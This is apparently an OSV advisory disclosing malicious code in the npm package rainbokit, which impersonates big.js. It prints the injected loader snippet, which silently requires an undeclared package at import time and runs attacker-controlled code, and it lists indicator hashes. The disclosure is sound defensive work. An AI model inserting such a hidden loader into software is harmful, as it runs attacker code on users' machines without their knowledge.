MAL-2026-6339

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/rainbokit/MAL-2026-6339.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6339
Published
2026-06-23T20:01:22Z
Modified
2026-06-23T21:01:22.847399387Z
Summary
Malicious code in rainbokit (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (692bd458c1417d7b87761cfa62e666685cb8d2ebf605b54de3ef8ad5dd993555)

The package publishes as rainbokit but ships a verbatim copy of the legitimate big.js library (matching author, repository URL, README, LICENCE, and keywords) so that an installer inspecting the on-disk package cannot distinguish it from genuine big.js. Both big.js (~line 488) and big.mjs contain an injected block try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } inserted into the middle of the otherwise-unmodified big.js source. When a consumer does require('rainbokit') or import 'rainbokit', this block runs parket-slot.from_str() — code controlled by the attacker. The require is wrapped in an empty try/catch and the resulting promise's rejection handler is also empty, so any error is silently swallowed (anti-detection). parket-slot is not declared in dependencies; the only declared dependency is log-taker@^0.0.9, which is never referenced from the visible code. This declared-but-unused / used-but-undeclared split is consistent with a multi-package staging campaign where the attacker resolves parket-slot and log-taker from sibling packages they control. The combination of identity spoofing of a popular package, hidden second-stage loader fired at import time, and silent error suppression demonstrates intent to execute attacker-controlled code on installer machines.

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-06-23T20:48:30.343279355Z",
            "source": "amazon-inspector",
            "sha256": "692bd458c1417d7b87761cfa62e666685cb8d2ebf605b54de3ef8ad5dd993555",
            "versions": [
                "0.0.8"
            ],
            "id": "IN-MAL-2026-007352",
            "modified_time": "2026-06-23T20:01:22Z"
        }
    ]
}
References
Credits

Affected packages

npm / rainbokit

Package

Affected ranges

Affected versions

0.*
0.0.8

Database specific

indicators
{
    "evidence_files": [
        {
            "tlsh": "24c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc",
            "sha256": "5b803b2bbd43db704b5802fa5bf4da96e79c3b876d74495116b53a837101dace",
            "path": "big.js"
        },
        {
            "tlsh": "c5210467c9a59da70af86ba47c6c03aaf1151b1f00a08c57b07b130c4b3355b2095bbd",
            "sha256": "f27b0f0cf64e2f0fa98af800ba0c69165e32467f71217cea46b728ae47c6ef66",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "rainbokit-0.0.8.tgz",
            "hashes": {
                "sha1": "e107f63317c88d055fbd985080782ebfe649544f",
                "sha512_sri": "sha512-7Fg9gkQIbCKJn9Q19TIzfaRWCdfzYaqL0zUjnUoU5O0hPoAiL/0X6J/wBTlwQTdmKB1k7IZO2w5zC+gNlUsd0w=="
            }
        }
    ]
}
cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/rainbokit/MAL-2026-6339.json"